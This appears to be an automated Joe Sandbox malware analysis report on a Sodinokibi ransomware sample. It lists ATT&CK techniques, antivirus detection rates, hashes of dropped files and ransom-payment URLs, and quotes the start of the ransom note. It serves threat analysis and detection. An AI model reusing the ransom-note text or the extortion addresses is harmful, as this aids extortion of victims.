        Techniques per tactic, in the order the report lists them. A number in parentheses is the signature count the report shows beside that technique; entries without one are the unobserved placeholders of the matrix template.

        Initial Access: Replication Through Removable Media (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
        Execution: Windows Management Instrumentation (1), Service Execution (1), Native API (22), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript
        Persistence: Windows Service (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
        Privilege Escalation: Windows Service (1), Process Injection (12), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
        Defense Evasion: Masquerading (3), Virtualization/Sandbox Evasion (1), Process Injection (12), Obfuscated Files or Information (1), Software Packing, Steganography, Compile After Delivery, Indicator Removal from Tools, Masquerading, Invalid Code Signature
        Credential Access: Input Capture (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
        Discovery: Security Software Discovery (12), Virtualization/Sandbox Evasion (1), Process Discovery (3), Application Window Discovery (1), Peripheral Device Discovery (11), Account Discovery (1), System Owner/User Discovery (1), System Service Discovery (1), File and Directory Discovery (1), System Information Discovery (25)
        Lateral Movement: Replication Through Removable Media (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content
        Collection: Input Capture (1), Archive Collected Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
        Command and Control: Encrypted Channel (2), Proxy (1), Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
        Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station, Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
        Impact: Data Encrypted for Impact (1), Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

        Behavior Graph

        Screenshots


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        Sample_5fba9b06c7da400016eb6275.exe | 90% | Virustotal |
        Sample_5fba9b06c7da400016eb6275.exe | 49% | Metadefender |
        Sample_5fba9b06c7da400016eb6275.exe | 86% | ReversingLabs | Win32.Ransomware.Sodinokibi
        Sample_5fba9b06c7da400016eb6275.exe | 100% | Avira | TR/Crypt.XPACK.Gen
        Sample_5fba9b06c7da400016eb6275.exe | 100% | Joe Sandbox ML |

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        Source | Detection | Scanner | Label
        0.0.Sample_5fba9b06c7da400016eb6275.exe.9b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        0.2.Sample_5fba9b06c7da400016eb6275.exe.9b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F | 0% | Avira URL Cloud | safe
        http://decryptor.cc/ | 2% | Virustotal |
        http://decryptor.cc/ | 0% | Avira URL Cloud | safe
        http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ | 0% | Avira URL Cloud | safe
        http://decryptor.cc/A7014F8C2779026F | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        Name: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt (19.0.dr)
        Malicious: true
        Antivirus Detection: Avira URL Cloud: safe
        Reputation: unknown

        Name: http://decryptor.cc/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp
        Malicious: false
        Antivirus Detection: 2%, Virustotal; Avira URL Cloud: safe
        Reputation: unknown

        Name: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp
        Malicious: true
        Antivirus Detection: Avira URL Cloud: safe
        Reputation: unknown

        Name: http://decryptor.cc/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt (19.0.dr)
        Malicious: false
        Antivirus Detection: Avira URL Cloud: safe
        Reputation: unknown

        Name: https://torproject.org/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp; Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp; su84mu33c1-readme.txt (19.0.dr)
        Malicious: false
        Reputation: high

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:326335
          Start date:03.12.2020
          Start time:10:02:31
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 19s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:Sample_5fba9b06c7da400016eb6275.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed:24
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.evad.winEXE@2/207@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 98.2% (good quality ratio 94.3%)
          • Quality average: 87.1%
          • Quality standard deviation: 24.9%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe
          • Report size getting too big, too many NtOpenKeyEx calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---
          [+] Whats Happen? [+]
          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
          [+] What guarantees? [+]
          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Program Files (x86)\Microsoft SQL Server\110\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Program Files (x86)\Microsoft SQL Server\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Program Files (x86)\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Program Files\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Recovery\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\Desktop\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\Documents\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\Downloads\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\Favorites\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\Links\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\Music\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: identical to C:\Program Files (x86)\Microsoft SQL Server\110\Shared\su84mu33c1-readme.txt above (same size and hashes)
          C:\Users\Default\NTUSER.DAT.LOG1
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):57576
          Entropy (8bit):7.9967612790440015
          Encrypted:true
          SSDEEP:1536:vPdyaRoGas1a+D5xLSxQdaXafUNWw1DiOme6Z+b:McdzDLSydBwue6gb
          MD5:6DA85E5486469464AB62C13D8586F55C
          SHA1:F26B562A26D70C286574599C02EF629BCD9B223C
          SHA-256:C9CD37432616FEB68566448BD6D6705A0A6142266D7BAC384FE37CC1ABA5589D
          SHA-512:60345C22D5E2BBCC60E75B3ADF904371452250BC148F13621FB786523FA7856A06ACC6F9AAE3D539C80986DE902124B7B47317678118CDBB2F4F49D8E36FBDE7
          Malicious:false
          Reputation:low
          C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):65768
          Entropy (8bit):7.997488810750565
          Encrypted:true
          SSDEEP:1536:+haveFRMDA5sd8G1EIP+IQnffP6I11CDjKiy0SmaJfTMHgf6Y7W0A8H:+CeSW8RP+16I0XyLmc+MbAW
          MD5:140C67C7D00B1212B48BBF89FE090654
          SHA1:425C48C20E3EB6A5DAC564608B67E3F65F13E02E
          SHA-256:5BD3E511C7443B8AC8CC788D5463E95DD16131B3B00666544E954AC9C2AF02AB
          SHA-512:46E5559BEC176F68A166374F2CFAD3D3AD2B142CEAAD9C73C37E78BF38459B215105FD1E4A914B86668C44C047BDA48112469129CAF384937B40A2D1CBFFF3A8
          Malicious:false
          Reputation:low
          C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):524520
          Entropy (8bit):7.9996414441647055
          Encrypted:true
          SSDEEP:12288:OaK9Zq1wAAjS6IAkTwVy44J9Vk/08ObqzAHHNlGWwv5:Kw1wnjjkSeJ9i/0tbqkHHNgWwB
          MD5:7A35CD0AF3AB22B0D866F89843FAC8FF
          SHA1:33C9B852246034CDE75A57E89AABBEAEDFBFF193
          SHA-256:01214D0CA14625BD561F759C6BC8B27B25E1B07F55692CAB5AF1C14F44A141D4
          SHA-512:D5EBEBA8A0EC0823797B12994A37E7C6BA9908820DD99F60B0174A1E22946A396D8E8BF8314838DC3EFDEB0E21453186AB7BD814A5147795949F7AE1EC19307B
          Malicious:false
          Reputation:low
          Preview: ....J.I^e..U..)1r..^!-U..a............\.8P0...gp_>,$.Lul...y>.?...N$.......u. w.2p....i.w._.~o4`.<y.6Z.F94..~.i....y.O"... ^..b...fs.a??./....4.A.......2.V7.:...r...X.F....s.F].....0j8. ]..........<.......Z.Z.h.^p).......'..$r(.A..#z\..2.'.....R.V.g7.A.............Fz...4...')..k..S+..^........;..J.%.y....)......^.?q......._.A&...?4.I7W../...-.....z.l...r..f.}.........,.1&.p{~./7U..P.F.3..!..u...E..........x..........j.1Ro.f...F..6.^.A......:.Z!If6'(...C...#B.U!,....s.e.W8H9..].J...%..M........d...... z.).`.............*o.m.).I&.U.&....a..q.!L@.>@#.T.C`4|.>^,[....|.9.^hE.P.+....W.:..o8=..)...S.7..;{.J......bb.....v"....HpW.d.!...4o.....5.......!L2.......".....S...[0.A.z..+..L....V..xf...B.........L.!..9.....G....q......O..m..z.$b...GCr.....{.._..>...Q.U(..|.u.T .lK.....|R.uS...,.0%.B..<..b5.....k....,.H...../S....Si3......-00..b.6J.k......P.q.g.....=......CI......(.&m..;.>1t....-H.D`.C%....=[%.p>j..No..O!.f..c.A`...`..J.F.e.pQ.nb.t
          C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):524520
          Entropy (8bit):7.999638362448107
          Encrypted:true
          SSDEEP:12288:x5ULCn3cOGhaejQNCrJ3VfNF+7Q5dd5VCDVfKgXyrYdvm8jzXmwt6W:x5U+d7NgJFP+k5b5qfVyrYdvmGzXmw0W
          MD5:3FC26A30052BCA80D7EBBDC2C68FF11C
          SHA1:3B5DE44E7D8BF8BA0222F666913D9E913FEDAEA4
          SHA-256:8BB6D3B8F214E8694D99D4CE9041AE49246F151BE4098E0D730F7D53EC1F12D2
          SHA-512:E41B10D360DC295FDF3F41E408512F09F52A2E1CDA4D3A292BF68010213CFB5DF225A5314B7F4A46B44643AB5483AD25EC89E52BA0962F2719E44B7B461484C6
          Malicious:false
          Reputation:low
          Preview: Y.;.l.%Y.6.AQ...<..+n.....e..U..C&...K....P..g.Pyn..%.0..Tu....P..c..d.""2...J.j..=.HN....{..K.xa(tf.=P6.9....&.......?^WW..)<p.....y..{Q]..v .5!~....ta....M.5:..e?U...d.....':.?.Q.6+....}..^.C..&.k..x..Gi+.9EHZRCdT.8.....\.U...W/.....J.W[..u7..o.....e......aJ..\.q....V....I&..<.@..?.1j..]....c.rgT9w%".....Gs......=|G..M.ml..o].=_C.LJ.h...].y. ....'..T......gx,....w..N.r7...W.....9....+.g..2......R..j...r.d.8....|h[.h.{.D...UE`..._..n...j.qj>.....B.QFu@s.6..{;.....C.7i.........c.z.'.'...2Z.c=)8.-:..=i......o....g.L.u Pw.."R......w.T... .J.iR.Z.Y.o.d.............{P......../..{=....../bF)VSa3....Zu,.3..}...:.UC....\`K....?..=.L..............:VJ..E.....5.\.......R.P..,.. Q.f;...d..k.5....v...%.R.......(..Qp...O.Wvd.....Y.rb.w..uyJ.ks.....V=."j...=.....eH...c...1....xj.%........@\....2.aeS.....A`.BAcS>...c....E...K.~.,V.sid:....<.\...sQ..>..F.4Q._...@...... .%Y.$`.Q.A]...sz..CO'..8D).6;E.....GV.Wc=...z.i....-.....W%.....'XU)t..A......wl\
          C:\Users\Default\Pictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Saved Games\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
